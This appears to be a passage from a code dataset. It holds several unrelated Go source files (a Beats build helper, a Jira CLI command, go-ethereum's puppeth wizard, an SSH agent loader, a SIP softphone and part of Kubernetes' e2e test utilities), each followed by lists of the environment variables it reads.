func isGoModRoot(path string) (bool, error) {
gomodPath := filepath.Join(path, "go.mod")
_, err := os.Stat(gomodPath)
if os.IsNotExist(err) {
return false, nil
}
if err != nil {
return false, err
}
return true, nil
}
func getProjectRepoInfoUnderGopath() (*ProjectRepoInfo, error) {
var (
cwd = CWD()
errs []string
rootDir string
)
srcDirs, err := listSrcGOPATHs()
if err != nil {
return nil, err
}
for _, srcDir := range srcDirs {
_, root, err := vcs.FromDir(cwd, srcDir)
if err != nil {
// Try the next gopath.
errs = append(errs, err.Error())
continue
}
rootDir = filepath.Join(srcDir, root)
break
}
if rootDir == "" {
return nil, errors.Errorf("error while determining root directory: %v", errs)
}
subDir, err := filepath.Rel(rootDir, cwd)
if err != nil {
return nil, errors.Wrap(err, "failed to get relative path to repo root")
}
rootImportPath, err := gotool.GetModuleName()
if err != nil {
return nil, err
}
return &ProjectRepoInfo{
RootImportPath: rootImportPath,
CanonicalRootImportPath: filepath.ToSlash(extractCanonicalRootImportPath(rootImportPath)),
RootDir: rootDir,
SubDir: subDir,
ImportPath: filepath.ToSlash(filepath.Join(rootImportPath, subDir)),
}, nil
}
func extractCanonicalRootImportPath(rootImportPath string) string {
// In order to be compatible with go modules, the root import
// path of any module at major version v2 or higher must include
// the major version.
// Ref: https://github.com/golang/go/wiki/Modules#semantic-import-versioning
//
// Thus, Beats has to include the major version as well.
// This regex removes the major version from the import path.
re := regexp.MustCompile(`(/v[1-9][0-9]*)$`)
return re.ReplaceAllString(rootImportPath, "")
}
func listSrcGOPATHs() ([]string, error) {
var (
cwd = CWD()
errs []string
srcDirs []string
)
for _, gopath := range filepath.SplitList(build.Default.GOPATH) {
gopath = filepath.Clean(gopath)
if !strings.HasPrefix(cwd, gopath) {
// Fixes an issue on macOS when /var is actually /private/var.
var err error
gopath, err = filepath.EvalSymlinks(gopath)
if err != nil {
errs = append(errs, err.Error())
continue
}
}
srcDirs = append(srcDirs, filepath.Join(gopath, "src"))
}
if len(srcDirs) == 0 {
return srcDirs, errors.Errorf("failed to find any GOPATH %v", errs)
}
return srcDirs, nil
}
| [
"\"BEAT_GO_VERSION\"",
"\"BEAT_VERSION\"",
"\"BEAT_DOC_BRANCH\""
] | [] | [
"BEAT_VERSION",
"BEAT_GO_VERSION",
"BEAT_DOC_BRANCH"
] | [] | ["BEAT_VERSION", "BEAT_GO_VERSION", "BEAT_DOC_BRANCH"] | go | 3 | 0 | |
cmd/jkl/create.go | package main
import (
"bytes"
"errors"
"flag"
"fmt"
"io"
"os"
"strings"
"text/template"
"otremblay.com/jkl"
)
type CreateCmd struct {
args []string
project string
file string
issuetype string
}
func NewCreateCmd(args []string) (*CreateCmd, error) {
ccmd := &CreateCmd{project: os.Getenv("JIRA_PROJECT")}
f := flag.NewFlagSet("x", flag.ExitOnError)
f.StringVar(&ccmd.project, "p", "", "Jira project key")
f.StringVar(&ccmd.file, "f", "", "File to get issue description from")
f.Parse(args)
ccmd.args = f.Args()
return ccmd, nil
}
var ErrCcmdJiraProjectRequired = errors.New("Jira project needs to be set")
func (ccmd *CreateCmd) Create() error {
var b = bytes.NewBuffer([]byte{})
var readfile bool
if fp := os.Getenv("JIRA_ISSUE_TEMPLATE"); fp != "" {
if f, err := os.Open(fp); err == nil {
_, err := io.Copy(b, f)
if err == nil {
readfile = true
}
}
}
if ccmd.project == "" {
return ErrCcmdJiraProjectRequired
}
isstype := ""
if len(ccmd.args) > 0 {
isstype = ccmd.args[0]
}
cm, err := jkl.GetCreateMeta(ccmd.project, isstype)
if err != nil {
fmt.Fprintln(os.Stderr, fmt.Sprintf("Error getting the CreateMeta for project [%s] and issue types [%s]", ccmd.project, isstype), err)
}
if !readfile {
createTemplate.Execute(b, cm)
}
var iss *jkl.JiraIssue
// TODO: Evil badbad don't do this.
var isst = cm.Projects[0].IssueTypes[0].Fields
for _, v := range cm.Projects[0].IssueTypes {
if strings.ToLower(isstype) == strings.ToLower(v.Name) {
isst = v.Fields
break
}
}
em := &jkl.EditMeta{Fields: isst}
if ccmd.file != "" {
iss, err = GetIssueFromFile(ccmd.file, b, em)
if err != nil {
return err
}
} else {
iss, err = GetIssueFromTmpFile(b, em)
if err != nil {
return err
}
}
if iss.Fields != nil &&
(iss.Fields.Project == nil || iss.Fields.Project.Key == "") {
iss.Fields.Project = &jkl.Project{Key: ccmd.project}
}
iss, err = jkl.Create(iss)
if err != nil {
return err
}
fmt.Println(iss.Key)
return nil
}
func (ccmd *CreateCmd) Run() error {
return ccmd.Create()
}
var createTemplate = template.Must(template.New("createissue").Parse(`{{range .Projects -}}
Project: {{.Key}}
{{range .IssueTypes -}}
Issue Type: {{.Name}}
Summary:
Description:
{{.RangeFieldSpecs}}
{{end}}
{{end}}`))
| [
"\"JIRA_PROJECT\"",
"\"JIRA_ISSUE_TEMPLATE\""
] | [] | [
"JIRA_PROJECT",
"JIRA_ISSUE_TEMPLATE"
] | [] | ["JIRA_PROJECT", "JIRA_ISSUE_TEMPLATE"] | go | 2 | 0 | |
ethereum/cmd/puppeth/wizard_intro.go | // Copyright 2017 The go-ethereum Authors
// This file is part of go-ethereum.
//
// go-ethereum is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// go-ethereum is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with go-ethereum. If not, see <http://www.gnu.org/licenses/>.
package main
import (
"bufio"
"encoding/json"
"fmt"
"io/ioutil"
"os"
"path/filepath"
"strings"
"sync"
"github.com/tenderly/solidity-hmr/ethereum/log"
)
// makeWizard creates and returns a new puppeth wizard.
func makeWizard(network string) *wizard {
return &wizard{
network: network,
conf: config{
Servers: make(map[string][]byte),
},
servers: make(map[string]*sshClient),
services: make(map[string][]string),
in: bufio.NewReader(os.Stdin),
}
}
// run displays some useful infos to the user, starting on the journey of
// setting up a new or managing an existing Ethereum private network.
func (w *wizard) run() {
fmt.Println("+-----------------------------------------------------------+")
fmt.Println("| Welcome to puppeth, your Ethereum private network manager |")
fmt.Println("| |")
fmt.Println("| This tool lets you create a new Ethereum network down to |")
fmt.Println("| the genesis block, bootnodes, miners and ethstats servers |")
fmt.Println("| without the hassle that it would normally entail. |")
fmt.Println("| |")
fmt.Println("| Puppeth uses SSH to dial in to remote servers, and builds |")
fmt.Println("| its network components out of Docker containers using the |")
fmt.Println("| docker-compose toolset. |")
fmt.Println("+-----------------------------------------------------------+")
fmt.Println()
// Make sure we have a good network name to work with fmt.Println()
// Docker accepts hyphens in image names, but doesn't like it for container names
if w.network == "" {
fmt.Println("Please specify a network name to administer (no spaces, hyphens or capital letters please)")
for {
w.network = w.readString()
if !strings.Contains(w.network, " ") && !strings.Contains(w.network, "-") && strings.ToLower(w.network) == w.network {
fmt.Printf("\nSweet, you can set this via --network=%s next time!\n\n", w.network)
break
}
log.Error("I also like to live dangerously, still no spaces, hyphens or capital letters")
}
}
log.Info("Administering Ethereum network", "name", w.network)
// Load initial configurations and connect to all live servers
w.conf.path = filepath.Join(os.Getenv("HOME"), ".puppeth", w.network)
blob, err := ioutil.ReadFile(w.conf.path)
if err != nil {
log.Warn("No previous configurations found", "path", w.conf.path)
} else if err := json.Unmarshal(blob, &w.conf); err != nil {
log.Crit("Previous configuration corrupted", "path", w.conf.path, "err", err)
} else {
// Dial all previously known servers concurrently
var pend sync.WaitGroup
for server, pubkey := range w.conf.Servers {
pend.Add(1)
go func(server string, pubkey []byte) {
defer pend.Done()
log.Info("Dialing previously configured server", "server", server)
client, err := dial(server, pubkey)
if err != nil {
log.Error("Previous server unreachable", "server", server, "err", err)
}
w.lock.Lock()
w.servers[server] = client
w.lock.Unlock()
}(server, pubkey)
}
pend.Wait()
w.networkStats()
}
// Basics done, loop ad infinitum about what to do
for {
fmt.Println()
fmt.Println("What would you like to do? (default = stats)")
fmt.Println(" 1. Show network stats")
if w.conf.Genesis == nil {
fmt.Println(" 2. Configure new genesis")
} else {
fmt.Println(" 2. Manage existing genesis")
}
if len(w.servers) == 0 {
fmt.Println(" 3. Track new remote server")
} else {
fmt.Println(" 3. Manage tracked machines")
}
if len(w.services) == 0 {
fmt.Println(" 4. Deploy network components")
} else {
fmt.Println(" 4. Manage network components")
}
choice := w.read()
switch {
case choice == "" || choice == "1":
w.networkStats()
case choice == "2":
if w.conf.Genesis == nil {
fmt.Println()
fmt.Println("What would you like to do? (default = create)")
fmt.Println(" 1. Create new genesis from scratch")
fmt.Println(" 2. Import already existing genesis")
choice := w.read()
switch {
case choice == "" || choice == "1":
w.makeGenesis()
case choice == "2":
w.importGenesis()
default:
log.Error("That's not something I can do")
}
} else {
w.manageGenesis()
}
case choice == "3":
if len(w.servers) == 0 {
if w.makeServer() != "" {
w.networkStats()
}
} else {
w.manageServers()
}
case choice == "4":
if len(w.services) == 0 {
w.deployComponent()
} else {
w.manageComponents()
}
default:
log.Error("That's not something I can do")
}
}
}
| [
"\"HOME\""
] | [] | [
"HOME"
] | [] | ["HOME"] | go | 1 | 0 | |
internal/hostkey/agent.go | package hostkey
import (
"fmt"
"net"
"os"
"sync"
"golang.org/x/crypto/ssh/agent"
)
var (
agentOnce sync.Once
agentClient agent.ExtendedAgent
agentErr error
)
func LoadAgent() (agent.ExtendedAgent, error) {
var conn net.Conn
agentOnce.Do(func() {
socket := os.Getenv("SSH_AUTH_SOCK")
conn, agentErr = net.Dial("unix", socket)
if agentErr != nil {
agentErr = fmt.Errorf("Failed to open SSH_AUTH_SOCK: %w", agentErr)
return
}
agentClient = agent.NewClient(conn)
})
if agentErr != nil {
return nil, agentErr
}
return agentClient, nil
}
| [
"\"SSH_AUTH_SOCK\""
] | [] | [
"SSH_AUTH_SOCK"
] | [] | ["SSH_AUTH_SOCK"] | go | 1 | 0 | |
fone/main.go | // Copyright 2020 Justine Alexandra Roberts Tunney
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
// #cgo pkg-config: ncurses libpulse-simple
// #include <stdlib.h>
// #include <ncurses.h>
// #include <pulse/simple.h>
// #include <pulse/error.h>
import "C"
import (
"errors"
"flag"
"fmt"
"io/ioutil"
"log"
"net"
"net/http"
"os"
"os/signal"
"time"
"unsafe"
"github.com/ktmdan/gosip/dialog"
"github.com/ktmdan/gosip/dsp"
"github.com/ktmdan/gosip/rtp"
"github.com/ktmdan/gosip/sdp"
"github.com/ktmdan/gosip/sip"
"github.com/ktmdan/gosip/util"
)
const (
hz = 8000
chans = 1
ptime = 20
ssize = 2
psamps = hz / (1000 / ptime) * chans
pbytes = psamps * ssize
)
var (
addressFlag = flag.String(
"address",
"",
"Public IP (or hostname) of the local machine. Defaults to asking an untrusted webserver.",
)
paServerFlag = flag.String("paServer", "", "PulseAudio server name")
paSinkFlag = flag.String("paSink", "", "PulseAudio device or sink name")
muteFlag = flag.Bool("mute", false, "Send comfort noise rather than microphone input")
paName = C.CString("fone")
)
func main() {
log.SetFlags(log.LstdFlags | log.Lmicroseconds | log.Lshortfile)
flag.Usage = func() {
fmt.Fprintf(os.Stderr, "Usage: %s URI\n", os.Args[0])
flag.PrintDefaults()
}
flag.Parse()
if len(flag.Args()) != 1 {
flag.Usage()
os.Exit(1)
}
// Whom Are We Calling?
requestURIString := flag.Args()[0]
requestURI, err := sip.ParseURI([]byte(requestURIString))
if err != nil {
fmt.Fprintf(os.Stderr, "Bad Request URI: %s\n", err.Error())
os.Exit(1)
}
// Computer Speaker
speaker, err := makePulseAudio(C.PA_STREAM_PLAYBACK, requestURIString)
if err != nil {
panic(err)
}
defer C.pa_simple_free(speaker)
defer C.pa_simple_flush(speaker, nil)
// Computer Microphone
mic, err := makePulseAudio(C.PA_STREAM_RECORD, requestURIString)
if err != nil {
panic(err)
}
defer C.pa_simple_free(mic)
// Get Public IP Address
publicIP := *addressFlag
if publicIP == "" {
publicIP, err = getPublicIP()
if err != nil {
panic(err)
}
}
// Create RTP Session
rs, err := rtp.NewSession("")
if err != nil {
panic(err)
}
defer rs.Close()
rtpPort := uint16(rs.Sock.LocalAddr().(*net.UDPAddr).Port)
// Construct SIP INVITE
invite := &sip.Msg{
Method: sip.MethodInvite,
Request: requestURI,
Via: &sip.Via{Host: publicIP},
To: &sip.Addr{Uri: requestURI},
From: &sip.Addr{Uri: &sip.URI{Host: publicIP, User: os.Getenv("USER")}},
Contact: &sip.Addr{Uri: &sip.URI{Host: publicIP}},
Payload: &sdp.SDP{
Addr: publicIP,
Origin: sdp.Origin{
ID: util.GenerateOriginID(),
Addr: publicIP,
},
Audio: &sdp.Media{
Port: rtpPort,
Codecs: []sdp.Codec{sdp.ULAWCodec, sdp.DTMFCodec},
},
},
Warning: "dark lord funk you up",
}
// Create SIP Dialog State Machine
dl, err := dialog.NewDialog(invite)
if err != nil {
panic(err)
}
// Send Audio Every 20ms
var frame rtp.Frame
awgn := dsp.NewAWGN(-45.0)
ticker := time.NewTicker(ptime * time.Millisecond)
defer ticker.Stop()
// Ctrl+C or Kill Graceful Shutdown
death := make(chan os.Signal, 1)
signal.Notify(death, os.Interrupt, os.Kill)
// DTMF Terminal Input
keyboard := make(chan byte)
keyboardStart := func() {
C.cbreak()
C.noecho()
go func() {
var buf [1]byte
for {
amt, err := os.Stdin.Read(buf[:])
if err != nil || amt != 1 {
log.Printf("Keyboard: %s\r\n", err)
return
}
keyboard <- buf[0]
}
}()
}
C.initscr()
defer C.endwin()
// Let's GO!
var answered bool
var paerr C.int
for {
select {
// Send Audio
case <-ticker.C:
if *muteFlag {
for n := 0; n < psamps; n++ {
frame[n] = awgn.Get()
}
} else {
if C.pa_simple_read(mic, unsafe.Pointer(&frame[0]), pbytes, &paerr) != 0 {
log.Printf("Microphone: %s\r\n", C.GoString(C.pa_strerror(paerr)))
break
}
}
if err := rs.Send(&frame); err != nil {
log.Printf("RTP: %s\r\n", err.Error())
}
// Send DTMF
case ch := <-keyboard:
if err := rs.SendDTMF(ch); err != nil {
log.Printf("DTMF: %s\r\n", err.Error())
break
}
log.Printf("DTMF: %c\r\n", ch)
// Receive Audio
case frame := <-rs.C:
if len(frame) != psamps {
log.Printf("RTP: Received undersized frame: %d != %d\r\n", len(frame), psamps)
} else {
if C.pa_simple_write(speaker, unsafe.Pointer(&frame[0]), pbytes, &paerr) != 0 {
log.Printf("Speaker: %s\r\n", C.GoString(C.pa_strerror(paerr)))
}
}
rs.R <- frame
// Signalling
case rs.Peer = <-dl.OnPeer:
case state := <-dl.OnState:
switch state {
case dialog.Answered:
answered = true
keyboardStart()
case dialog.Hangup:
if answered {
return
} else {
os.Exit(1)
}
}
// Errors and Interruptions
case err := <-dl.OnErr:
log.Fatalf("SIP: %s\r\n", err.Error())
case err := <-rs.E:
log.Printf("RTP: %s\r\n", err.Error())
rs.CloseAfterError()
dl.Hangup <- true
case <-death:
dl.Hangup <- true
}
}
}
func makePulseAudio(direction C.pa_stream_direction_t, streamName string) (*C.pa_simple, error) {
var ss C.pa_sample_spec
ss.format = C.PA_SAMPLE_S16NE
ss.rate = hz
ss.channels = chans
var ba C.pa_buffer_attr
if direction == C.PA_STREAM_PLAYBACK {
ba.maxlength = pbytes * 4
ba.tlength = pbytes
ba.prebuf = pbytes * 2
ba.minreq = pbytes
ba.fragsize = 0xffffffff
} else {
ba.maxlength = pbytes * 4
ba.tlength = 0xffffffff
ba.prebuf = 0xffffffff
ba.minreq = 0xffffffff
ba.fragsize = pbytes
}
var paServer *C.char
if *paServerFlag != "" {
paServer = C.CString(*paServerFlag)
defer C.free(unsafe.Pointer(paServer))
}
var paSink *C.char
if *paSinkFlag != "" {
paSink = C.CString(*paSinkFlag)
defer C.free(unsafe.Pointer(paSink))
}
paStreamName := C.CString(streamName)
defer C.free(unsafe.Pointer(paStreamName))
var paerr C.int
pa := C.pa_simple_new(paServer, paName, direction, paSink, paStreamName, &ss, nil, &ba, &paerr)
if pa == nil {
return nil, errors.New(C.GoString(C.pa_strerror(paerr)))
}
return pa, nil
}
func getPublicIP() (string, error) {
resp, err := http.Get("http://api.ipify.org")
if err != nil {
return "", err
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
return "", err
}
return string(body), nil
} | [
"\"USER\""
] | [] | [
"USER"
] | [] | ["USER"] | go | 1 | 0 | |
test/e2e/framework/util.go | /*
Copyright 2014 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package framework
import (
"bytes"
"context"
"encoding/json"
"errors"
"fmt"
"io"
"io/ioutil"
"math/rand"
"net"
"net/http"
"net/url"
"os"
"os/exec"
"path"
"path/filepath"
"regexp"
goruntime "runtime"
"sort"
"strconv"
"strings"
"sync"
"syscall"
"text/tabwriter"
"time"
"github.com/golang/glog"
"golang.org/x/crypto/ssh"
"golang.org/x/net/websocket"
"google.golang.org/api/googleapi"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
gomegatypes "github.com/onsi/gomega/types"
apierrs "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"k8s.io/apimachinery/pkg/fields"
"k8s.io/apimachinery/pkg/labels"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/runtime/schema"
"k8s.io/apimachinery/pkg/types"
"k8s.io/apimachinery/pkg/util/sets"
"k8s.io/apimachinery/pkg/util/uuid"
"k8s.io/apimachinery/pkg/util/wait"
"k8s.io/apimachinery/pkg/watch"
testutil "k8s.io/kubernetes/test/utils"
"k8s.io/client-go/discovery"
"k8s.io/client-go/dynamic"
restclient "k8s.io/client-go/rest"
"k8s.io/client-go/tools/clientcmd"
clientcmdapi "k8s.io/client-go/tools/clientcmd/api"
"k8s.io/kubernetes/pkg/api"
"k8s.io/kubernetes/pkg/api/v1"
v1helper "k8s.io/kubernetes/pkg/api/v1/helper"
nodeutil "k8s.io/kubernetes/pkg/api/v1/node"
podutil "k8s.io/kubernetes/pkg/api/v1/pod"
apps "k8s.io/kubernetes/pkg/apis/apps/v1beta1"
batchinternal "k8s.io/kubernetes/pkg/apis/batch"
batch "k8s.io/kubernetes/pkg/apis/batch/v1"
extensionsinternal "k8s.io/kubernetes/pkg/apis/extensions"
extensions "k8s.io/kubernetes/pkg/apis/extensions/v1beta1"
"k8s.io/kubernetes/pkg/client/clientset_generated/clientset"
"k8s.io/kubernetes/pkg/client/clientset_generated/internalclientset"
"k8s.io/kubernetes/pkg/client/conditions"
"k8s.io/kubernetes/pkg/cloudprovider/providers/azure"
gcecloud "k8s.io/kubernetes/pkg/cloudprovider/providers/gce"
"k8s.io/kubernetes/pkg/controller"
deploymentutil "k8s.io/kubernetes/pkg/controller/deployment/util"
nodectlr "k8s.io/kubernetes/pkg/controller/node"
"k8s.io/kubernetes/pkg/kubectl"
"k8s.io/kubernetes/pkg/kubelet/util/format"
"k8s.io/kubernetes/pkg/master/ports"
sshutil "k8s.io/kubernetes/pkg/ssh"
uexec "k8s.io/kubernetes/pkg/util/exec"
labelsutil "k8s.io/kubernetes/pkg/util/labels"
"k8s.io/kubernetes/pkg/util/system"
utilversion "k8s.io/kubernetes/pkg/util/version"
"k8s.io/kubernetes/plugin/pkg/scheduler/algorithm/predicates"
"k8s.io/kubernetes/plugin/pkg/scheduler/schedulercache"
testutils "k8s.io/kubernetes/test/utils"
)
const (
// How long to wait for the pod to be listable
PodListTimeout = time.Minute
// Initial pod start can be delayed O(minutes) by slow docker pulls
// TODO: Make this 30 seconds once #4566 is resolved.
PodStartTimeout = 5 * time.Minute
// If there are any orphaned namespaces to clean up, this test is running
// on a long lived cluster. A long wait here is preferably to spurious test
// failures caused by leaked resources from a previous test run.
NamespaceCleanupTimeout = 15 * time.Minute
// Some pods can take much longer to get ready due to volume attach/detach latency.
slowPodStartTimeout = 15 * time.Minute
// How long to wait for a service endpoint to be resolvable.
ServiceStartTimeout = 1 * time.Minute
// How often to Poll pods, nodes and claims.
Poll = 2 * time.Second
pollShortTimeout = 1 * time.Minute
pollLongTimeout = 5 * time.Minute
// service accounts are provisioned after namespace creation
// a service account is required to support pod creation in a namespace as part of admission control
ServiceAccountProvisionTimeout = 2 * time.Minute
// How long to try single API calls (like 'get' or 'list'). Used to prevent
// transient failures from failing tests.
// TODO: client should not apply this timeout to Watch calls. Increased from 30s until that is fixed.
SingleCallTimeout = 5 * time.Minute
// How long nodes have to be "ready" when a test begins. They should already
// be "ready" before the test starts, so this is small.
NodeReadyInitialTimeout = 20 * time.Second
// How long pods have to be "ready" when a test begins.
PodReadyBeforeTimeout = 5 * time.Minute
// How long pods have to become scheduled onto nodes
podScheduledBeforeTimeout = PodListTimeout + (20 * time.Second)
podRespondingTimeout = 15 * time.Minute
ServiceRespondingTimeout = 2 * time.Minute
EndpointRegisterTimeout = time.Minute
// How long claims have to become dynamically provisioned
ClaimProvisionTimeout = 5 * time.Minute
// When these values are updated, also update cmd/kubelet/app/options/options.go
currentPodInfraContainerImageName = "gcr.io/google_containers/pause"
currentPodInfraContainerImageVersion = "3.0"
// How long each node is given during a process that restarts all nodes
// before the test is considered failed. (Note that the total time to
// restart all nodes will be this number times the number of nodes.)
RestartPerNodeTimeout = 5 * time.Minute
// How often to Poll the statues of a restart.
RestartPoll = 20 * time.Second
// How long a node is allowed to become "Ready" after it is restarted before
// the test is considered failed.
RestartNodeReadyAgainTimeout = 5 * time.Minute
// How long a pod is allowed to become "running" and "ready" after a node
// restart before test is considered failed.
RestartPodReadyAgainTimeout = 5 * time.Minute
// Number of objects that gc can delete in a second.
// GC issues 2 requestes for single delete.
gcThroughput = 10
// Minimal number of nodes for the cluster to be considered large.
largeClusterThreshold = 100
// TODO(justinsb): Avoid hardcoding this.
awsMasterIP = "172.20.0.9"
// Serve hostname image name
ServeHostnameImage = "gcr.io/google_containers/serve_hostname:v1.4"
// ssh port
sshPort = "22"
)
var (
// Label allocated to the image puller static pod that runs on each node
// before e2es.
ImagePullerLabels = map[string]string{"name": "e2e-image-puller"}
// For parsing Kubectl version for version-skewed testing.
gitVersionRegexp = regexp.MustCompile("GitVersion:\"(v.+?)\"")
// Slice of regexps for names of pods that have to be running to consider a Node "healthy"
requiredPerNodePods = []*regexp.Regexp{
regexp.MustCompile(".*kube-proxy.*"),
regexp.MustCompile(".*fluentd-elasticsearch.*"),
regexp.MustCompile(".*node-problem-detector.*"),
}
)
type Address struct {
internalIP string
externalIP string
hostname string
}
// GetServerArchitecture fetches the architecture of the cluster's apiserver.
func GetServerArchitecture(c clientset.Interface) string {
arch := ""
sVer, err := c.Discovery().ServerVersion()
if err != nil || sVer.Platform == "" {
// If we failed to get the server version for some reason, default to amd64.
arch = "amd64"
} else {
// Split the platform string into OS and Arch separately.
// The platform string may for example be "linux/amd64", "linux/arm" or "windows/amd64".
osArchArray := strings.Split(sVer.Platform, "/")
arch = osArchArray[1]
}
return arch
}
// GetPauseImageName fetches the pause image name for the same architecture as the apiserver.
func GetPauseImageName(c clientset.Interface) string {
return currentPodInfraContainerImageName + "-" + GetServerArchitecture(c) + ":" + currentPodInfraContainerImageVersion
}
// GetPauseImageNameForHostArch fetches the pause image name for the same architecture the test is running on.
// TODO: move this function to the test/utils
func GetPauseImageNameForHostArch() string {
return currentPodInfraContainerImageName + "-" + goruntime.GOARCH + ":" + currentPodInfraContainerImageVersion
}
// SubResource proxy should have been functional in v1.0.0, but SubResource
// proxy via tunneling is known to be broken in v1.0. See
// https://github.com/kubernetes/kubernetes/pull/15224#issuecomment-146769463
//
// TODO(ihmccreery): remove once we don't care about v1.0 anymore, (tentatively
// in v1.3).
var SubResourcePodProxyVersion = utilversion.MustParseSemantic("v1.1.0")
var SubResourceServiceAndNodeProxyVersion = utilversion.MustParseSemantic("v1.2.0")
func GetServicesProxyRequest(c clientset.Interface, request *restclient.Request) (*restclient.Request, error) {
subResourceProxyAvailable, err := ServerVersionGTE(SubResourceServiceAndNodeProxyVersion, c.Discovery())
if err != nil {
return nil, err
}
if subResourceProxyAvailable {
return request.Resource("services").SubResource("proxy"), nil
}
return request.Prefix("proxy").Resource("services"), nil
}
// unique identifier of the e2e run
var RunId = uuid.NewUUID()
type CreateTestingNSFn func(baseName string, c clientset.Interface, labels map[string]string) (*v1.Namespace, error)
type ContainerFailures struct {
status *v1.ContainerStateTerminated
Restarts int
}
func GetMasterHost() string {
masterUrl, err := url.Parse(TestContext.Host)
ExpectNoError(err)
return masterUrl.Host
}
func nowStamp() string {
return time.Now().Format(time.StampMilli)
}
func log(level string, format string, args ...interface{}) {
fmt.Fprintf(GinkgoWriter, nowStamp()+": "+level+": "+format+"\n", args...)
}
func Logf(format string, args ...interface{}) {
log("INFO", format, args...)
}
func Failf(format string, args ...interface{}) {
msg := fmt.Sprintf(format, args...)
log("INFO", msg)
Fail(nowStamp()+": "+msg, 1)
}
func Skipf(format string, args ...interface{}) {
msg := fmt.Sprintf(format, args...)
log("INFO", msg)
Skip(nowStamp() + ": " + msg)
}
func SkipUnlessNodeCountIsAtLeast(minNodeCount int) {
if TestContext.CloudConfig.NumNodes < minNodeCount {
Skipf("Requires at least %d nodes (not %d)", minNodeCount, TestContext.CloudConfig.NumNodes)
}
}
func SkipUnlessNodeCountIsAtMost(maxNodeCount int) {
if TestContext.CloudConfig.NumNodes > maxNodeCount {
Skipf("Requires at most %d nodes (not %d)", maxNodeCount, TestContext.CloudConfig.NumNodes)
}
}
func SkipUnlessAtLeast(value int, minValue int, message string) {
if value < minValue {
Skipf(message)
}
}
func SkipIfProviderIs(unsupportedProviders ...string) {
if ProviderIs(unsupportedProviders...) {
Skipf("Not supported for providers %v (found %s)", unsupportedProviders, TestContext.Provider)
}
}
func SkipUnlessSSHKeyPresent() {
if _, err := GetSigner(TestContext.Provider); err != nil {
Skipf("No SSH Key for provider %s: '%v'", TestContext.Provider, err)
}
}
func SkipUnlessProviderIs(supportedProviders ...string) {
if !ProviderIs(supportedProviders...) {
Skipf("Only supported for providers %v (not %s)", supportedProviders, TestContext.Provider)
}
}
func SkipUnlessNodeOSDistroIs(supportedNodeOsDistros ...string) {
if !NodeOSDistroIs(supportedNodeOsDistros...) {
Skipf("Only supported for node OS distro %v (not %s)", supportedNodeOsDistros, TestContext.NodeOSDistro)
}
}
func SkipIfContainerRuntimeIs(runtimes ...string) {
for _, runtime := range runtimes {
if runtime == TestContext.ContainerRuntime {
Skipf("Not supported under container runtime %s", runtime)
}
}
}
func ProviderIs(providers ...string) bool {
for _, provider := range providers {
if strings.ToLower(provider) == strings.ToLower(TestContext.Provider) {
return true
}
}
return false
}
func NodeOSDistroIs(supportedNodeOsDistros ...string) bool {
for _, distro := range supportedNodeOsDistros {
if strings.ToLower(distro) == strings.ToLower(TestContext.NodeOSDistro) {
return true
}
}
return false
}
func ProxyMode(f *Framework) (string, error) {
pod := &v1.Pod{
ObjectMeta: metav1.ObjectMeta{
Name: "kube-proxy-mode-detector",
Namespace: f.Namespace.Name,
},
Spec: v1.PodSpec{
HostNetwork: true,
Containers: []v1.Container{
{
Name: "detector",
Image: "gcr.io/google_containers/e2e-net-amd64:1.0",
Command: []string{"/bin/sleep", "3600"},
},
},
},
}
f.PodClient().CreateSync(pod)
defer f.PodClient().DeleteSync(pod.Name, &metav1.DeleteOptions{}, DefaultPodDeletionTimeout)
cmd := "curl -q -s --connect-timeout 1 http://localhost:10249/proxyMode"
stdout, err := RunHostCmd(pod.Namespace, pod.Name, cmd)
if err != nil {
return "", err
}
Logf("ProxyMode: %s", stdout)
return stdout, nil
}
func SkipUnlessServerVersionGTE(v *utilversion.Version, c discovery.ServerVersionInterface) {
gte, err := ServerVersionGTE(v, c)
if err != nil {
Failf("Failed to get server version: %v", err)
}
if !gte {
Skipf("Not supported for server versions before %q", v)
}
}
func SkipIfMissingResource(clientPool dynamic.ClientPool, gvr schema.GroupVersionResource, namespace string) {
dynamicClient, err := clientPool.ClientForGroupVersionResource(gvr)
if err != nil {
Failf("Unexpected error getting dynamic client for %v: %v", gvr.GroupVersion(), err)
}
apiResource := metav1.APIResource{Name: gvr.Resource, Namespaced: true}
_, err = dynamicClient.Resource(&apiResource, namespace).List(metav1.ListOptions{})
if err != nil {
// not all resources support list, so we ignore those
if apierrs.IsMethodNotSupported(err) || apierrs.IsNotFound(err) || apierrs.IsForbidden(err) {
Skipf("Could not find %s resource, skipping test: %#v", gvr, err)
}
Failf("Unexpected error getting %v: %v", gvr, err)
}
}
// ProvidersWithSSH are those providers where each node is accessible with SSH
var ProvidersWithSSH = []string{"gce", "gke", "aws", "local"}
type podCondition func(pod *v1.Pod) (bool, error)
// logPodStates logs basic info of provided pods for debugging.
func logPodStates(pods []v1.Pod) {
// Find maximum widths for pod, node, and phase strings for column printing.
maxPodW, maxNodeW, maxPhaseW, maxGraceW := len("POD"), len("NODE"), len("PHASE"), len("GRACE")
for i := range pods {
pod := &pods[i]
if len(pod.ObjectMeta.Name) > maxPodW {
maxPodW = len(pod.ObjectMeta.Name)
}
